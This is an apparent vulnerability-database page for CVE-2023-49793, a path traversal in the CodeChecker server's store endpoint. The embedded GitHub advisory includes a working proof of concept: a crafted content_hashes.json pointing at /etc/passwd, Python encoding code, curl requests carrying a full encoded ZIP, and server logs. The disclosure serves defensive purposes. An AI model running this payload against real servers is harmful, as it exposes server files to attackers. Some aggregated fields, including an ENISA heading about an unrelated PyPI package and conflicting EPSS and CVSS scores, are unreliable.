What is the severity of CVE-2023-49793?

CVE-2023-49793 has a MEDIUM severity rating with a CVSS score of 6.5. The EPSS (Exploit Prediction Scoring System) score is 0.00108, indicating a 0.1% probability of exploitation in the wild within 30 days.

When was CVE-2023-49793 published?

CVE-2023-49793 was published on June 24, 2024.

CVE-2023-49793

MEDIUM

Published 2024-06-24T17:36:21.827Z

Actions:

Expert Analysis

Professional remediation guidance

Get tailored security recommendations from our analyst team for CVE-2023-49793. We'll provide specific mitigation strategies based on your environment and risk profile.

CVSS Score

V3.1

6.5

/10

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Base Score Metrics

Exploitability: N/A Impact: N/A

EPSS Score

v2025.03.14

0.001

probability

of exploitation in the wild

There is a 0.1% chance that this vulnerability will be exploited in the wild within the next 30 days.

Updated: 2025-06-25

Exploit Probability

Percentile: 0.299

Higher than 29.9% of all CVEs

Attack Vector Metrics

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

LOW

User Interaction

NONE

Scope

UNCHANGED

Impact Metrics

Confidentiality

HIGH

Integrity

NONE

Availability

NONE

Description

CodeChecker is an analyzer tooling, defect database and viewer extension for the Clang Static Analyzer and Clang Tidy. Zip files uploaded to the server endpoint of `CodeChecker store` are not properly sanitized. An attacker, using a path traversal attack, can load and display files on the machine of `CodeChecker server`. The vulnerable endpoint is `/Default/v6.53/CodeCheckerService@massStoreRun`. The path traversal vulnerability allows reading data on the machine of the `CodeChecker server`, with the same permission level as the `CodeChecker server`.
The attack requires a user account on the `CodeChecker server`, with permission to store to a server, and view the stored report. This vulnerability has been patched in version 6.23.

Understanding This Vulnerability

This Common Vulnerabilities and Exposures (CVE) entry provides detailed information about a security vulnerability that has been publicly disclosed. CVEs are standardized identifiers assigned by MITRE Corporation to track and catalog security vulnerabilities across software and hardware products.

The severity rating (MEDIUM) indicates the potential impact of this vulnerability based on the CVSS (Common Vulnerability Scoring System) framework. Higher severity ratings typically indicate vulnerabilities that could lead to more significant security breaches if exploited. Security teams should prioritize remediation efforts based on severity, exploit availability, and the EPSS (Exploit Prediction Scoring System) score, which predicts the likelihood of exploitation in the wild.

If this vulnerability affects products or systems in your infrastructure, we recommend reviewing the affected products section, checking for available patches or updates from vendors, and implementing recommended workarounds or solutions until a permanent fix is available. Organizations should also monitor security advisories and threat intelligence feeds for updates about active exploitation of this vulnerability.

Available Exploits

No exploits available for this CVE.

Related News

No news articles found for this CVE.

Affected Products

Ericsson

codechecker

Affected Versions:

< 6.23.0

ericsson

codechecker

Affected Versions:

References

https://github.com/Ericsson/codechecker/security/advisories/GHSA-h26w-r4m5-8rrf (CNA)

https://github.com/Ericsson/codechecker/commit/46bada41e32f3ba0f6011d5c556b579f6dddf07a (CNA)

EU Vulnerability Database

Monitored by ENISA for EU cybersecurity

EU Coordination

EU Coordinated

Exploitation Status

No Known Exploitation

EUVD ID

View on ENISA

ENISA Analysis

Malicious code in bioql (PyPI)

Affected Products (ENISA)

ericsson

codechecker

ENISA Scoring

CVSS Score (3.1)

6.5

/10

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

EPSS Score

0.780

probability

ENISA References

https://github.com/Ericsson/codechecker/security/advisories/GHSA-h26w-r4m5-8rrf

https://github.com/Ericsson/codechecker/commit/46bada41e32f3ba0f6011d5c556b579f6dddf07a

https://nvd.nist.gov/vuln/detail/CVE-2023-49793

https://github.com/pypa/advisory-database/tree/main/vulns/codechecker/PYSEC-2024-54.yaml

Data provided by ENISA EU Vulnerability Database. Last updated: October 3, 2025

GitHub Security Advisories

Community-driven vulnerability intelligence from GitHub

✓ GitHub Reviewed MODERATE

CodeChecker has a Path traversal in `CodeChecker server` in the endpoint of `CodeChecker store`

GHSA-h26w-r4m5-8rrf

Advisory Details

## Summary ZIP files uploaded to the server-side endpoint handling a `CodeChecker store` are not properly sanitized. An attacker can exercise a path traversal to make the `CodeChecker server` load and display files from an arbitrary location on the server machine. ## Details ### Target The vulnerable endpoint is `/<PRODUCT_URL>/v6.53/CodeCheckerService@massStoreRun`. ### Exploit overview The attack is made possible by improper sanitization at one point in the process. 1. When the ZIP file is uploaded by `CodeChecker store`, it is first unzipped to a temporary directory (safely). 2. When deciding which files to insert into CodeChecker's internal database, the decision is made based on the `content_hashes.json` in the ZIP. An attacker has control over the contents of this file. 3. After reading that file, the paths specified in the JSON are normalized by this code: https://github.com/Ericsson/codechecker/blob/fa41e4e5d9566b5a4f5a80a27bddec73a5146f5a/web/server/codechecker_server/api/mass_store_run.py#L442-L444 4. Providing sufficiently many `../../`s inside the `content_hashes.json`, an attacker can control the insertion of completely arbitrary files into CodeChecker's internal database. 5. This is confirmed in the log output: ``` mass_store_run.py:444 __store_source_files() - Storing source file: /etc/passwd ``` 6. Once the file is inserted into the internal database, it can be displayed trivially on the Web interface. As CodeChecker doesn't distinguish between filenames after the ZIP is extraced, an attacker can define aliases in `content_hashes.json`. ``` mass_store_run.py:444 __store_source_files() - Storing source file: /home/discookie/.codechecker/tmpx7hg1teb/root/etc/passwd mass_store_run.py:453 __store_source_files() - /etc/passwd not found or already stored. ``` 7. The file is displayed in the Web UI if and only if there is at least one _bug report_ in it. The bug reports are coming from the ZIP and the attacker can craft the required contents for this. If done so, the logs confirm the requirement for presenting the results of the exploit will be triggered: ``` hash.py:208 get_report_path_hash() - 2|12|Path traversal|/etc/passwdcore.DivideZero3d3a7db6520247eaf90719a53d7103e2 ``` 8. The server emits the contents of the injected files from the server's database to all users: ![CodeChecker's Web UI showing the snapshot of the /etc/passwd file that was injected to the database due to the path traversal attack.](https://user-images.githubusercontent.com/16914176/278057281-2c6994ed-4c24-4026-a6b6-148ac43243ca.png) > [!NOTE] > The file is shown with the contents as it was on the system when the exploited `CodeChecker store` was exercised. This attack does not allow the server to return the "live" contents of a file on the server's storage — the attacker(s) must recurringly exercise the exploit to keep the injected files "updated" in the database. ## PoC The minimal example that can trigger the exploit can be downloaded: [`PoC.zip`](https://github.com/Ericsson/codechecker/files/14757143/PoC.zip). The key to the exploit is the `content_hashes.json` file. The additional files create a report in the loaded `/etc/passwd` file, so it is displayed in the web UI. <details><summary><tt>/content_hashes.json</tt></summary> ```json {"/../../../../../../../../../../../../../../../etc/passwd": "malformed_hash", "/etc/passwd": "malformed_hash"} ``` </details> #### Uploading the ZIP to the server The communication between the `CodeChecker store` and the server is done by transmitting the ZIP file in a Base64-encoded string. Encoding the ZIP into the format of the API can be done with Python: ```py import base64 import zlib with open("PoC.zip", "rb") as f: contents = f.read() encoded = base64.b64encode(zlib.compress(contents)) print(encoded) ``` The result of the compression and encoding can be sent to the running server over the API. When the API is called, the exploit is exercised. ```bash curl "<SERVER_URL>/<PRODUCT_URL>/v6.53/CodeCheckerService" \ --data \ '[1,"massStoreRun",1,0,{"1":{"str":"poc"},"3":{"str":"6.22.1"},"4":{"str":"<ENCODED_ZIP>"},"5":{"tf":0}}]' ``` <details><summary>One-line PoC</summary> ```bash curl "http://localhost:8001/Default/v6.53/CodeCheckerService" \ --data \ '[1,"massStoreRun",1,0,{"1":{"str":"poc"},"3":{"str":"6.22.1"},"4" {"str":"eJzNVk9vIzUUT3cpS4MqIcEB2Msw6oGV2vmXzKRZZVPYdpGqLSXSdrXqVquRM+NJhk7GI9tpN5Qe0SJx4MARCfEB+AaIE2glrnAAwY0DXwAQ4gT2ZCbj+ZNI2ROTWLaff+/5+edn+/XuXn2uXuOfi48frP7zh49Ym5eXWXFQSGFI7SEgQ0iU9wkKL2RVUZb4Q+qoESDk3JVvSvIIBB7CI+jGJuVNSV4MuOwx/16J/fvQP35QE74XWMEwQpgSNUMhnEfdEFCg5WoeMFxLc7Vtz2u0XVNvt0yrrbcA8JqN2MyUjK+YGeutk78fXqnVeLGWMTOCFLiAgilf63WJffIZxMRHIVujsZmIKEIBYYKTaZ9/F1kzhoRgBDktDnKhM4TOKcTyZgEDHMoM2+F4xJCN4qiDRiMQcm5PHhXHMp9kSzEMRZfe3Aag3296Ld2Ebrule6bnsbXp/WZjGxrA0TRNt6DeNG+U3DhH+NQPB7brY+hQhCfcrFqCoTGNxtSOAB1WAzAk44DaBI2xA23PDyDnqEBMjCRgFAVQiQKf0NiWEEp5+GWJsxAEkw/Y8rnp0ig59aMIcs604hD1R5BQNvE8p/pw4HNGdau9bTTaTaOpaJap66axWYGG8c4IWNPSrEazWXA/6ybNR+v1yyxa77Fo/WtlfPuja7UaL+Yy0Sqy2Nl5PAqkJCxuybqiyRIMWfCxjb0l3z96Z2tb3unWO2/svbd7dNy7I8VaUu/+7YP9XUneUtW3I2ZMVfeO9qTewf69I4nZUNU7h7IkDymNbqrq+fm5AjhKYaHJgez4YhRBTCcHzNgWU1Bc6spsmqn1nDtM6voO7dbXOqdw0nV9MAgRob5DOioXMDnAGPDGWopcm2IdQOGAxWUKZGJCMVtZ9wANfEeCGCPcURNZpsaPnc0PYlnRQRgqe/6Z78KHEKOysguJg/2IH9Cydo+dAYliwBcIgrKyT8gYxvegnV7EyLMDP4S2H05Fj2nZbMNtsE3vW6ahGc0WBF5ba+ltYDbclq41oFGeKECMm7yLM+oSElCQDa51fDb1AOKuzoyl7QzMz2wVWqsC8+VUgQuWO2p+M/n9Ibg72/Oc6+keRCJ2gUNTPLvF3Bw8oQuesR3IkTeXvrwXVRQuIrGaxkV+V1I5n8wcnYkyu9YIGMCqhS+I00QZg3AASU5X2JFiL0/OHHpEgsrrnUfRQpLm0bSIqAJVy/ve/P/43lHFbcj1xOOVyWfSTDZzveq+TQJDeIeFYCnYSJOkmZnUgXg0fZ9nay3c5XOu44DFIQFihGYLi/UGMISYvQOu3Z8sZ3uXZWC70wysfIEmT1RZa5pWVTqUNrI6fu669d7dlSs7tXlJ+UaS2EpJXZGi15PBldqrtU++6LQOr/2ycvr0z095/evn13/cY/V0knmZdTrJS6x8KSQTouWfn7weW/qe/Pvtu6xO+6LlcjYuWn66TJoiTj0xvV2+mB9+I8eHpannZfAic+srz5rPi358Ix98zOdP69c2rpf8KOdmoh9fX33GTE104+LJ7xt8+rT+7qeUjtXnOWaV/fYZBZ+9yHv/Ac5gmHc="},"5":{"tf":0}}]' ``` </details> <details><summary>Full server logs for the <tt>store</tt> processing</summary> ``` [INFO][2023-10-25 14:30:31] {server} [2043] <139754026274816> - server.py:342 do_POST() - 127.0.0.1:33352 -- [Anonymous] POST /Default/v6.53/CodeCheckerService@massStoreRun [INFO][2023-10-25 14:30:31] {server} [2043] <139754026274816> - mass_store_run.py:61 __enter__() - [poc] Unzip storage file... [DEBUG][2023-10-25 14:30:31] {server} [2043] <139754026274816> - mass_store_run.py:82 unzip() - Unzipping mass storage ZIP '/tmp/tmpenegwbxj.zip' to '/home/discookie/.codechecker/tmpx7hg1teb'... [INFO][2023-10-25 14:30:31] {server} [2043] <139754026274816> - mass_store_run.py:64 __exit__() - [poc] Unzip storage file done... (duration: 0.0 sec) [DEBUG][2023-10-25 14:30:31] {server} [2043] <139754026274816> - mass_store_run.py:1298 store() - Using unzipped folder '/home/discookie/.codechecker/tmpx7hg1teb' [INFO][2023-10-25 14:30:31] {server} [2043] <139754026274816> - mass_store_run.py:61 __enter__() - [poc] Store source files... [INFO][2023-10-25 14:30:31] {server} [2043] <139754026274816> - mass_store_run.py:1310 store() - [poc] Storing 2 source file(s). [DEBUG][2023-10-25 14:30:31] {server} [2043] <139754026274816> - mass_store_run.py:444 __store_source_files() - Storing source file: /etc/passwd [DEBUG][2023-10-25 14:30:31] {server} [2043] <139754026274816> - mass_store_run.py:444 __store_source_files() - Storing source file: /home/discookie/.codechecker/tmpx7hg1teb/root/etc/passwd [DEBUG][2023-10-25 14:30:31] {server} [2043] <139754026274816> - mass_store_run.py:453 __store_source_files() - /etc/passwd not found or already stored. [DEBUG][2023-10-25 14:30:31] {server} [2043] <139754026274816> - mass_store_run.py:463 __store_source_files() - 17 fileid found [INFO][2023-10-25 14:30:31] {server} [2043] <139754026274816> - mass_store_run.py:64 __exit__() - [poc] Store source files done... (duration: 0.01 sec) [DEBUG][2023-10-25 14:30:31] {server} [2043] <139754026274816> - mass_store_run.py:1363 store() - Storing into run 'poc' locked at '2023-10-25 14:30:31.615536'. [DEBUG][2023-10-25 14:30:31] {server} [2043] <139754026274816> - mass_store_run.py:686 __add_or_update_run() - Adding run 'poc'... [DEBUG][2023-10-25 14:30:31] {server} [2043] <139754026274816> - mass_store_run.py:730 __add_or_update_run() - Adding run history. [DEBUG][2023-10-25 14:30:31] {server} [2043] <139754026274816> - mass_store_run.py:755 __add_or_update_run() - Adding run done. [DEBUG][2023-10-25 14:30:31] {server} [2043] <139754026274816> - mass_store_run.py:761 __add_or_update_run() - Storing analysis statistics done. [INFO][2023-10-25 14:30:31] {server} [2043] <139754026274816> - mass_store_run.py:61 __enter__() - [poc] Store reports... [DEBUG][2023-10-25 14:30:31] {server} [2043] <139754026274816> - mass_store_run.py:1163 __store_reports() - Get reports from '/home/discookie/.codechecker/tmpx7hg1teb/reports' directory [DEBUG][2023-10-25 14:30:31] {server} [2043] <139754026274816> - mass_store_run.py:1163 __store_reports() - Get reports from '/home/discookie/.codechecker/tmpx7hg1teb/reports/a7d0fa2d60d08ff39d519756917aaf43' directory [DEBUG][2023-10-25 14:30:31] {server} [2043] <139754026274816> - mass_store_run.py:1175 __store_reports() - Parsing input file 'sample.plist' [DEBUG][2023-10-25 14:30:31] {report-converter} [2043] <139754026274816> - hash.py:208 get_report_path_hash() - 2|12|Path traversal|/etc/passwdcore.DivideZero3d3a7db6520247eaf90719a53d7103e2 [DEBUG][2023-10-25 14:30:31] {server} [2043] <139754026274816> - mass_store_run.py:987 __process_report_file() - Storing report to the database... [DEBUG][2023-10-25 14:30:31] {server} [2043] <139754026274816> - mass_store_run.py:827 __add_report_context() - Storing bug path positions. [DEBUG][2023-10-25 14:30:31] {server} [2043] <139754026274816> - mass_store_run.py:834 __add_report_context() - Storing bug path events. [DEBUG][2023-10-25 14:30:31] {server} [2043] <139754026274816> - mass_store_run.py:842 __add_report_context() - Storing notes. [DEBUG][2023-10-25 14:30:31] {server} [2043] <139754026274816> - mass_store_run.py:853 __add_report_context() - Storing macro expansions. [INFO][2023-10-25 14:30:31] {server} [2043] <139754026274816> - mass_store_run.py:1220 __store_reports() - [poc] Processed 1 analyzer result file(s). [INFO][2023-10-25 14:30:31] {server} [2043] <139754026274816> - mass_store_run.py:64 __exit__() - [poc] Store reports done... (duration: 0.1 sec) [DEBUG][2023-10-25 14:30:31] {server} [2043] <139754026274816> - mass_store_run.py:1260 finish_checker_run() - Finishing checker run [INFO][2023-10-25 14:30:31] {server} [2043] <139754026274816> - mass_store_run.py:1397 store() - 'Anonymous' stored results (3 KB /decompressed/) to run 'poc' (id: 16) in 0.15 seconds. [INFO][2023-10-25 14:30:31] {store_time} [2043] <139754026274816> - mass_store_run.py:1414 store() - 2023-10-25T14:30:31.612326, 0.15s, "Default", "poc", 3KB, 1, 16 [DEBUG][2023-10-25 14:30:31] {profiler} [2043] <139754026274816> - profiler.py:59 debug_wrapper() - [0.173351s] massStoreRun ``` </details> ## Impact The path traversal vulnerability allows reading data on the machine of the `CodeChecker server`, with the same permission level as the `CodeChecker server` process. This allows for the exfiltration from the server-side storage medium. If the `CodeChecker server` is run with authentication enabled (not the default configuration), then the attack requires a valid user account on the `CodeChecker server`, with the permission to store to a database, and view the stored reports. CVSS 3.1 Base Score: 6.5 [AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N](https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator?vector=AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N&version=3.1) Reproducible up to version `6.22.1`.

Affected Packages

PyPI codechecker

ECOSYSTEM: ≥0 <6.23.0

CVSS Scoring

CVSS Score

5.0

CVSS Vector


                                    CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

References

WEB https://github.com/Ericsson/codechecker/security/advisories/GHSA-h26w-r4m5-8rrf

ADVISORY https://nvd.nist.gov/vuln/detail/CVE-2023-49793

WEB https://github.com/Ericsson/codechecker/commit/46bada41e32f3ba0f6011d5c556b579f6dddf07a

PACKAGE https://github.com/Ericsson/codechecker

WEB https://github.com/pypa/advisory-database/tree/main/vulns/codechecker/PYSEC-2024-54.yaml

Advisory provided by GitHub Security Advisory Database. Published: June 24, 2024, Modified: June 26, 2024

References

https://github.com/Ericsson/codechecker/security/advisories/GHSA-h26w-r4m5-8rrf

https://github.com/Ericsson/codechecker/commit/46bada41e32f3ba0f6011d5c556b579f6dddf07a

Published: 2024-06-24T17:36:21.827Z

Last Modified: 2024-08-02T22:01:26.011Z

Copied to clipboard!

CVE-2023-49793

Expert Analysis

CVSS Score

EPSS Score

Attack Vector Metrics

Impact Metrics

Description

Understanding This Vulnerability

Available Exploits

Related News

Affected Products

codechecker

Affected Versions:

codechecker

Affected Versions:

References

EU Vulnerability Database

EU Coordination

Exploitation Status

EUVD ID

ENISA Analysis

Affected Products (ENISA)

ENISA Scoring

CVSS Score (3.1)

EPSS Score

ENISA References

GitHub Security Advisories

CodeChecker has a Path traversal in `CodeChecker server` in the endpoint of `CodeChecker store`

Advisory Details

Affected Packages

CVSS Scoring

CVSS Score

CVSS Vector

References

References

Request Analysis

What to expect

Request Received!